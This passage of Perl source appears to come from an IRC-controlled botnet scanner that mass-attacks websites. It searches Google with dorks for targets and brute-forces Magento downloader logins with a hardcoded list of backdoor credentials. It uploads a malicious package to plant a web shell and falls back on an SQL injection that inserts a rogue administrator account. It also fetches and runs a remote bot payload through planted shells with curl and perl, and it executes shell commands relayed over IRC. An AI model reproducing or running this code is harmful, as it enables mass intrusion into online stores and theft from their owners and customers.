/) { my $test = "http".$site."sites/all/xxx.php"; my $test2 = "http".$site."error.php"; my $test3 = "http".$site."includes/include.php"; my $bypass = "http".$site."errors.php"; my $cekap = &get_content($test."?cmd=curl+-C+-+-O+".$botxx."%3Bperl+bot.log%3Brm+bot.log"); if ($cekap =~ /sEm - eXploit/) { my $safe = ""; my $os = ""; my $uid = ""; if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;} &msg("$chan","$drulogo5[4-5=4[8$engine4]5=4-5] 4$test 14[3$os14][3safemode10:3$safe14]"); &msg("$admin","$drulogo 15[14÷0 $engine 14÷15] 11sHell Access 4[0 $os 4]4[0 safemode10:3$safe 4]"); &mylove($bypass,$chan,$site,$engine); } my $get2 = &get_content($test2); if ($get2 =~ /sEm - eXploit/i){ my $safe = ""; my $os = ""; my $uid = ""; if ($get2 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($get2 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($get2 =~ /uid=(.*?)gid=/){$uid=$1;} &msg("$chan","$drulogo5[4-5=4[8$engine4]5=4-5] 4$test2 14[3$os14][3safemode10:3$safe14]"); &msg("$admin","$drulogo 15[14÷0 $engine 14÷15] 11sHell Access 4[0 $os 4]4[0 safemode10:3$safe 4]"); &mylove($bypass,$chan,$site,$engine); } my $get3 = &get_content($test3); if ($get3 =~ /sEm - eXploit/i){ my $safe = ""; my $os = ""; my $uid = ""; if ($get3 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($get3 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($get3 =~ /uid=(.*?)gid=/){$uid=$1;} &msg("$chan","$drulogo5[4-5=4[8$engine4]5=4-5] 4$test3 14[3$os14][3safemode10:3$safe14]"); &msg("$admin","$drulogo 15[14÷0 $engine 14÷15] 11sHell Access 4[0 $os 4]4[0 safemode10:3$safe 4]"); } } } } sub magento_xpl { my ($chan,$dork,$engine) = @_; ######################################### # ACTION SET # ######################################### my $xpl = "mage.tgz"; my %users = ( "magen" => "magen", "design" => "web", "system32" => "devil123", "system32" => "k4l0nkaja", "web" => "design", "veteran" => "jancok87", "forme" => "forme", "ImamBlack" => "web", "sales02" => "raimuelek", "go" => "hack", "qwe" => "asd", "privacy" => "tempek", "indoxploit" => "indoxploit", "coco" => "coco123", "google" => "123123", "mildnet" => "jandaku", "defaults01" => "defaults0123", "defaults0111" => "defaults012311", "default123" => "default123", "sysmon" => "bichhanh", "system_backup" => "123456", "systembackup" => "123456", "sysadm" => "123456", "devteam" => "123456", "sadmin" => "asdf", "stupid" => "stupid48", "hydra" => "hydra77", "policy" => "tempek", "lycoz" => "wew", "useradmin" => "jancok123", "jembut" => "jembut123", "ghaz" => "1020", "mag" => "gento", "tomhawk" => "ganteng", "dian" => "akuganteng", "mag404" => "gento404", "1466081648" => "w0w1998", "magSys" => "darzan", "peler123" => "peler123", "d4nc0k" => "cr3w", "kimcilcode" => "kepocok123", "1472876535" => "w0w1998", "admincoz" => "asdf", "hythan7id" => "hythan7id", "adm2018" => "adm2018", "user007" => "user007", "warz0ne" => "yoga0400", "cyberindo" => "devil123", "black" => "panthers", "ctrl" => "ctrl", "data" => "data", "exqc" => "123456", "dlc" => "dlc" ); ######################################### # ACTION SET # ######################################### my $count = 0; my @totexploit = &search_engine($chan,"",$dork,$engine,$maglogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; my $url = "http".$site."downloader/index.php"; my $check = &get_content($url); if ($count == $num-1) { &msg("$chan","1,1".&rainbow("$maglogo $engine Done ")); } if($check =~ /downloader/i && $check =~ /\/i){ if (my $pid = fork){ waitpid ($pid, 0); } else { if(fork) { exit; } else { my $scn = 1; if($scn) { my $login = 0; foreach my $k(keys %{users}) { my $loop = 1; my $user = $k; my $pass = $users{$k}; my $ua = LWP::UserAgent->new( keep_alive => 1, timeout => 120, agent => $uagent); $ua->requests_redirectable(['GET', 'HEAD', 'POST']); $ua->max_redirect(5); $ua->cookie_jar(HTTP::Cookies->new( file => "cookies.txt", autosave => 1)); my $response = $ua->request( POST "$url", Content_Type => 'form-data', Content => ["username" => $user,"password" => $pass ] ); my $res = $response->content; if($res =~ /Log Out/ig || $res =~/Return to Admin/ig) { $loop = 0; $login = 1; my $filesystem = ($res =~ /File_System/ig) ? "Exists" : "Not exists"; my $permission = ($res =~ /Warning: Your Magento folder does not have sufficient write permissions/ig) ? 'Denied' : 'Writable'; my $magexpl = ($res =~ /Grizzly3_MassEmail/ig) ? 1 : 0; my $m_fs = ($filesystem eq "Exists") ? "3Installed" : "14Not Found"; my $m_perm = ($permission eq "Denied") ? "4Denied" : "3Writable"; my $msg = "[8Filesystem:".$m_fs."15] 15[8Permission:".$m_perm."15] "; my $msg2 = "8$url 15[9Login:14 ".$user."15] 15,1[9PASS: ".$pass."15] ".$msg; &msg($chan,"1,1".&rainbow("$maglogo $engine <=> "). $msg2); if($magexpl) { my $urlxx = $url."?A=connectPackagesPost"; my $unin = $ua->request( POST "$urlxx", Content_Type => 'form-data', Content => [ "form_id" => 'connect_packages_0','actions[community|Grizzly3_MassEmail]' => 'uninstall'] ); if ($unin->is_success) { if($res =~ //g) { my $key = $1; my $urlx = $url."?A=connectInstallPackageUpload"; my $res2 = $ua->request( POST "$urlx", Content_Type => 'form-data', Content => [ "form_key" => $key,"file" => ["$xpl"]] ); if($res2->is_success) { my $url3 = "http".$site."cloud.php?silk"; my $check3 = &get_content($url3); if($check3 =~ /Touched\s*By\s*Silk\s*/ig || $check3 =~ /Uname\s*\:\s*/ig) { my $os = ""; if ($check3 =~ /Uname\s*:\s*(.*?)\ SHeLL").$msg); } } } } } } else { if($permission eq "Writable") { my $uploaded = 0; if($res =~ //g) { my $key = $1; my $url2 = "http".$site."downloader/index.php?A=connectInstallPackageUpload"; my $res2 = $ua->request( POST "$url2", Content_Type => "form-data", Content => [ "form_key" => $key, "file" => ["$xpl"] ] ); if($res2->is_success) { my $url3 = "http".$site."cloud.php?silk"; my $check3 = &get_content($url3); if($check3 =~ /Touched\s*By\s*Silk\s*/ig || $check3 =~ /Uname\s*\:\s*/ig) { my $os = ""; if ($check3 =~ /Uname\s*:\s*(.*?)\ SHeLL ").$msg); } } } } } } } if($loop) { sleep(5); } else { last; } } if(!$login) { # my $ptarget = "http".$site; # my $python = `python magsql.py $ptarget`; # print "$python\n\n"; my $dir = 0; my $local = "http".$site."app/etc/local.xml"; my $check = &get_content($local); if($check =~ /\\<\/frontName\>/ig) { $dir = $1; } if(!$dir) { $dir = "admin"; } my $url = "http".$site.$dir."/Cms_Wysiwyg/directive/index/"; my $ua = LWP::UserAgent->new( keep_alive => 1, timeout => 120, agent => $uagent); my $response = $ua->request( POST "$url", Content_Type => "form-data", Content => [ "filter" => encode_base64('popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);SET @SALT = "rp";SET @PASS = CONCAT(MD5(CONCAT( @SALT , "magen") ), CONCAT(":", @SALT ));SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ("Firstname","Lastname","er@sempak.com","magen",@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,"U",(SELECT user_id FROM admin_user WHERE username = "magen"),"Firstname");'), "___directive" => encode_base64('{{block type=Adminhtml/report_search_grid}}'), "forwarded" => "1" ] ); if($response->is_success) { &downloader_login($chan,$nick,$logo,$engine,$site,"magen","magen"); } } } } exit; } } } } } sub downloader_login { my ($chan,$nick,$logo,$engine,$site,$user,$pass) = @_; my $xpl = "mage.tgz"; my $url = "http".$site."downloader/index.php"; my $check = &_get($url); if($check->is_success) { my $ua = LWP::UserAgent->new( keep_alive => 1, timeout => 120, agent => $uagent); $ua->requests_redirectable(['GET', 'HEAD', 'POST']); $ua->max_redirect(5); $ua->cookie_jar(HTTP::Cookies->new( file => "cookies.txt", autosave => 1)); my $response = $ua->request( POST "$url", Content_Type => 'form-data', Content => [ "username" => $user,"password" => $pass ] ); my $res = $response->content; if($res =~ /Log Out/ig || $res =~/Return to Admin/ig) { my $permission = ($res =~ /Warning: Your Magento folder does not have sufficient write permissions/ig) ? 'Denied' : 'Writable'; my $filesystem = ($res =~ /File_System/ig) ? "Exists" : "Not exists"; my $magexpl = ($res =~ /Grizzly3_MassEmail/ig) ? 1 : 0; my $m_fs = ($filesystem eq "Exists") ? "3Installed" : "14Not Found"; my $m_perm = ($permission eq "Denied") ? "4Denied" : "3Writable"; my $msg = "[8Filesystem:".$m_fs."15] 15[8Permission:".$m_perm."15] "; my $msg2 = "8$url 15[9Login:14 ".$user."15] 15[9PASS: ".$pass."15] ".$msg; &msg($chan,"1,1".&rainbow("$maglogo $engine <=> "). $msg2); if($magexpl) { my $urlxx = $url."?A=connectPackagesPost"; my $unin = $ua->request( POST "$urlxx", Content_Type => 'form-data', Content => [ "form_id" => 'connect_packages_0','actions[community|Grizzly3_MassEmail]' => 'uninstall'] ); if ($unin->is_success) { if($res =~ //g) { my $key = $1; my $urlx = $url."?A=connectInstallPackageUpload"; my $res2 = $ua->request( POST "$urlx", Content_Type => 'form-data', Content => [ "form_key" => $key,"file" => ["$xpl"]] ); if($res2->is_success) { my $url3 = "http".$site."cloud.php?silk"; my $check3 = &get_content($url3); if($check3 =~ /Touched\s*By\s*Silk\s*/ig || $check3 =~ /Uname\s*\:\s*/ig) { my $os = ""; if ($check3 =~ /Uname\s*:\s*(.*?)\ SHeLL ").$msg); } } } } } } else { if($permission eq "Writable") { my $uploaded = 0; if($res =~ //g) { my $key = $1; my $urlx = $url."?A=connectInstallPackageUpload"; my $res2 = $ua->request( POST "$urlx", Content_Type => 'form-data', Content => [ "form_key" => $key,"file" => ["$xpl"]] ); if($res2->is_success) { my $url3 = "http".$site."/cloud.php?silk"; my $check3 = &get_content($url3); if($check3 =~ /Touched\s*By\s*Silk\s*/ig || $check3 =~ /Uname\s*\:\s*/ig) { my $os = ""; if ($check3 =~ /Uname\s*:\s*(.*?)\ 0) { # &msg("$chan","1,1".&rainbow("$logo $engine").&rainbow(" ".scalar(@total)." ")); # } return @clean; } ################################################################################## sub isFound() { my $status = 0; my $link = $_[0]; my $reqexp = $_[1]; my $res = &get_content($link); if ($res =~ /$reqexp/) { $status = 1 } return $status; } sub get_content() { my $url = $_[0]; my $ua = LWP::UserAgent->new(agent => $uagent); $ua->timeout($timot); my $req = HTTP::Request->new(GET => $url); my $res = $ua->request($req); return $res->content; } ######################################### SEARCH ENGINE sub google() { my @list; my $key = $_[0]; for (my $b=0; $b<=1000; $b+=20){ my $search = ("http://www.google.com/search?q=".uri_escape($key)."&tbm=isch&filter=0&start=".$b."&sa=N"); my $res = &search_engine_query($search); if ($res =~ /HTTP\/1.0 302/ && $res =~ /Location: (.*?)\s+/) { print "Banned\n$1\n\n" and last; } while ($res =~ m/ - /; } return @list; } sub gilax() { my @list; my $key = $_[0]; my $quer = $_[1]; for (my $b=0; $b<=1000; $b+=20){ my $search = ("http://www.google.com/search?q=".uri_escape($key.$quer)."&tbm=isch&filter=0&start=".$b."&sa=N"); my $res = &search_engine_query($search); if ($res =~ /HTTP\/1.0 302/ && $res =~ /Location: (.*?)\s+/) { print "Banned\n$1\n\n" and last; } while ($res =~ m/ - /; } return @list; } sub kukis { my $kue = "kue.txt"; open ( FILE,'<',$kue); chomp (my $retur = ); close FILE; return $retur; } sub search_engine_query() { my $url = $_[0]; my $kukis = &kukis; my $ua = LWP::UserAgent->new(max_redirect => 0,keep_alive => 1,agent => $uagent); # $ua->proxy(['http'], $lobeProxy); my $req = HTTP::Request->new(GET => $url, HTTP::Headers->new('Cookie'=> $kukis)); my $res = $ua->request($req); return $res->as_string; } ######################################### sub clean() { my @cln = (); my %visit = (); foreach my $element (@_) { $element =~ s/\/+/\//g; next if $visit{$element}++; $element =~ s/:\//:\/\//g; push @cln, $element; } return @cln; } sub links() { my @list; my $host = $_[0]; my $hdir = $_[0]; my $path = $_[0]; $hdir =~ s/(.*)\/[^\/]*$/\1\//; $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1\//; $path =~ s/\/[^\/]+\/[^\/]+\z/\//; (my $path2 = $path) =~ s/\/[^\/]+\/\z/\//; (my $path3 = $path2) =~ s/\/[^\/]+\/\z/\//; (my $path4 = $path3) =~ s/\/[^\/]+\/\z/\//; $path =~ s/.*\/\/$/$host/; $path2 =~ s/.*\/\/$/$host/; $path3 =~ s/.*\/\/$/$host/; $path4 =~ s/.*\/\/$/$host/; push(@list,$host); #,$hdir,$path,$path2,$path3,$path4); return @list; } ######################################### sub shell() { my $path = $_[0]; my $cmd = $_[1]; if ($cmd =~ /cd (.*)/) { chdir("$1") || &msg("$path","No such file or directory"); return; } elsif ($pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my @output = `$cmd 2>&1 3>&1`; my $c = 0; foreach my $output (@output) { $c++; chop $output; &msg("$path","$output"); if ($c == 5) { $c = 0; sleep 1; } } exit; }} } sub isAdmin() { my $status = 0; my $nick = $_[0]; if ($nick eq $admin) { $status = 1; } return $status; } sub msg() { return unless $#_ == 1; sendraw($IRC_cur_socket, "PRIVMSG $_[0] :$_[1]"); } sub nick() { return unless $#_ == 0; sendraw("NICK $_[0]"); } sub read_dorks() { my $dork = uri_escape($_[0]); my $file = "dorks.txt"; my $success = 0; open (file,"<$file"); while (my $dorkx=) { chop($dorkx); if ($dorkx =~ /^$dork$/){ $success = 1; } } close file; return $success; } sub write_dorks() { my $dorks = uri_escape($_[0]); my $file = "dorks.txt"; open (filex,">>$file"); print filex $dorks."\n"; close filex; } sub notice() { return unless $#_ == 1; sendraw("NOTICE $_[0] :$_[1]"); } sub randx { my @color = ("0","2","3","4","5","6","7","8","9","10","11","12","13","14","15"); my $warna = $color[rand(scalar(@color))]; return $warna; } sub randx2 { my @color2 = ("10","11","12","13","14","15"); my $warna2 = $color2[rand(scalar(@color2))]; return $warna2; } sub rainbow { my @rain; my $string = $_[0]; if ($string =~ /([-0-9])/) { my @stx = split("",$string); foreach $stx(@stx) { push(@rain,&randx2.$stx); } } else { my @stx = split("",$string); foreach $stx(@stx) { push(@rain,&randx.$stx); } } $rainx = join(/ /,@rain); return $rainx; }